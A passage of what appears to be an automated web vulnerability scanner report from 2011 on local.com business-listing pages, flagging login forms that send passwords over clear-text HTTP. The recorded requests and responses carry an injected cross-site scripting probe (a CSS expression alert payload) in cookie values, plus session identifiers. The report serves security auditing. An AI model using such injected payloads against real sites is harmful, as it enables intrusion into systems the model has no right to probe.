Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186474914335; domain=local.com; expires=Thu, 03-Feb-2011 16:30:47 GMT; path=/
Content-Length: 91928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cet Products & Liquidators in
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.10. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/equity-bank-63975058/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /business/details/dallas-tx/equity-bank-63975058/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 115967
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:47 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; domain=local.com; expires=Thu, 03-Feb-2011 16:30:47 GMT; path=/
Content-Length: 115967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Equity Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.11. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/hillcrest-bank-104826937/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /business/details/dallas-tx/hillcrest-bank-104826937/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 116644
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:00 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Hillcrest+Bank|Dallas%2c+TX|Retail+Banks|15020100|104826937~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186602212783; domain=local.com; expires=Thu, 03-Feb-2011 16:31:00 GMT; path=/
Content-Length: 116644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Hillcrest Bank in Dallas, TX
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.12. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/sterling-bank-16856575/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /business/details/dallas-tx/sterling-bank-16856575/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 116910
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:00 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Sterling+Bank|Dallas%2c+TX|Retail+Banks|15020100|16856575~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186605902360; domain=local.com; expires=Thu, 03-Feb-2011 16:31:00 GMT; path=/
Content-Length: 116910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Sterling Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.13. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/amegy-bank-97648000/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /business/details/map/dallas-tx/amegy-bank-97648000/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39485
Date: Thu, 03 Feb 2011 16:38:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:38:18 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Amegy Bank in Dallas, TX - (
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.14. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /business/details/map/dallas-tx/cet-products-liquidators-9985416/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 40029
Date: Thu, 03 Feb 2011 16:37:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:23 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Cet+Products+%26+Liquidators|Dallas%2c+TX|Appraisal+And+Liquidation+Services|11134700|9985416~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 40029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cet Products & Liquidators in
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.15. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/equity-bank-63975058/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /business/details/map/dallas-tx/equity-bank-63975058/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39437
Date: Thu, 03 Feb 2011 16:37:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Equity Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.16. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/hillcrest-bank-104826937/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /business/details/map/dallas-tx/hillcrest-bank-104826937/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39591
Date: Thu, 03 Feb 2011 16:37:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Hillcrest+Bank|Dallas%2c+TX|Retail+Banks|15020100|104826937~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Hillcrest Bank in Dallas, TX
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.17. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/sterling-bank-16856575/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /business/details/map/dallas-tx/sterling-bank-16856575/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39493
Date: Thu, 03 Feb 2011 16:37:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:50 GMT; path=/
